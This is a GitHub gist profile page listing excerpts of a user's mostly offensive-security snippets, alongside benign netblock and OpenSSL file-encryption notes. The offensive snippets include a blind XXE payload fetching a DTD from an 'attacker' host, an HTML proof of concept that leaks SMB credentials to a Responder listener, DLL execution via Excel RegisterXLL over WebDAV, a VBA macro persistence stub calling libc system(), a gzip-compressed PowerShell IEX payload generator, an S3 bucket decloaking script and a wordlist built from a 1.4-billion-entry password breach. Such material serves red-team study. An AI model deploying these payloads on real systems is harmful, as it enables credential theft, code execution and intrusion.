Skip to content

Instantly share code, notes, and snippets.

View Dlat's full-sized avatar

David Dlat

23 followers · 62 following
View GitHub Profile
@Dlat
Dlat / gist:86d7caa68fe6490b2d3dae52b3ab38ff
Created March 22, 2023 04:02
#!/usr/bin/env python
##
## netblock.py
## https://rmccurdy.com/.scripts/downloaded/
## Author: Michal Ludvig <michal@logix.cz>
## http://www.logix.cz/michal
##
## Simple tool to compute an IPv4 netblock covering
## all IP addresses given on the command line.
@Dlat
Dlat / breachcompilation.txt
Created April 2, 2019 09:16
1.4 billion password breach compilation wordlist
wordlist created from original 41G stash via:
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
Size:
@Dlat
Dlat / bucket-disclose.sh
Created February 13, 2019 18:13 — forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
@Dlat
Dlat / ExcelXLL.md
Created February 13, 2019 18:09 — forked from mgeeky/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@Dlat
Dlat / README.md
Created January 22, 2019 21:38 — forked from magnetikonline/README.md
AWS S3 bucket and IAM policy recipes.
@Dlat
Dlat / blind-xxe-payload-1.txt
Created August 20, 2018 20:11 — forked from mgeeky/blind-xxe-payload-1.txt
Simplest Blind XXE Payload to test within HTML request
Content-Type: text/xml
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxetestd [<!ENTITY xxetest SYSTEM "http://attacker/test.dtd">]><foo>&xxetest;</foo>
@Dlat
Dlat / vba-macro-mac-persistence.vbs
Created August 20, 2018 20:10 — forked from mgeeky/vba-macro-mac-persistence.vbs
(WIP) Working on VBA-based MacPersistance functionality for MS Office for Mac Macros.
#If VBA7 Then
' 64-bit Mac (2016)
Private Declare PtrSafe Function system Lib "libc.dylib" Alias "system" _
(ByVal command As String) As Long
Private Declare PtrSafe Function fopen Lib "libc.dylib" Alias "fopen" _
(ByVal file As String, ByVal mode As String) As LongPtr
Private Declare PtrSafe Function fputs Lib "libc.dylib" Alias "fputs" _
(ByVal str As String, ByVal file As LongPtr) As Long
Private Declare PtrSafe Function fclose Lib "libc.dylib" Alias "fclose" _
(ByVal file As LongPtr) As Long
@Dlat
Dlat / id_rsa_encryption.md
Created August 20, 2018 20:10
Encrypt/Decrypt a File using your SSH Public/Private Key on Mac OS X

A Guide to Encrypting Files with Mac OS X

This guide will demonstrate the steps required to encrypt and decrypt files using OpenSSL on Mac OS X. The working assumption is that by demonstrating how to encrypt a file with your own public key, you'll also be able to encrypt a file you plan to send to somebody else using their private key, though you may wish to use this approach to keep archived data safe from prying eyes.

Too Long, Didn't Read

Assuming you've already done the setup described later in this document, that id_rsa.pub.pcks8 is the public key you want to use, that id_rsa is the private key the recipient will use, and secret.txt is the data you want to transmit…

Encrypting

$ openssl rand 192 -out key

$ openssl aes-256-cbc -in secret.txt -out secret.txt.enc -pass file:key

@Dlat
Dlat / smb-credential-leak.html
Created August 20, 2018 20:08 — forked from mgeeky/smb-credential-leak.html
SMB Credentials leakage by MSEdge as presented in Browser Security White Paper, X41 D-Sec GmbH.
<!-- PoC for leaking SMB Credentials with listening Responder -->
<!-- as presented by X41 D-Sec GmbH in Browser Security White Paper. -->
<!-- To be used as: $ `responder -I eth0 -w -r f -v` -->
<body onmousemove="document.getElementById(6).click()">
<a id=6 href="\\192.168.56.101\edgeleak" download></a>
</body>
@Dlat
Dlat / compressedPowershell.py
Created August 20, 2018 20:07 — forked from mgeeky/compressedPowershell.py
Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
#!/usr/bin/python3
import io
import sys
import gzip
import base64
def main(argv):
if len(argv) < 2:
print('Usage: ./compressedPowershell.py <input>')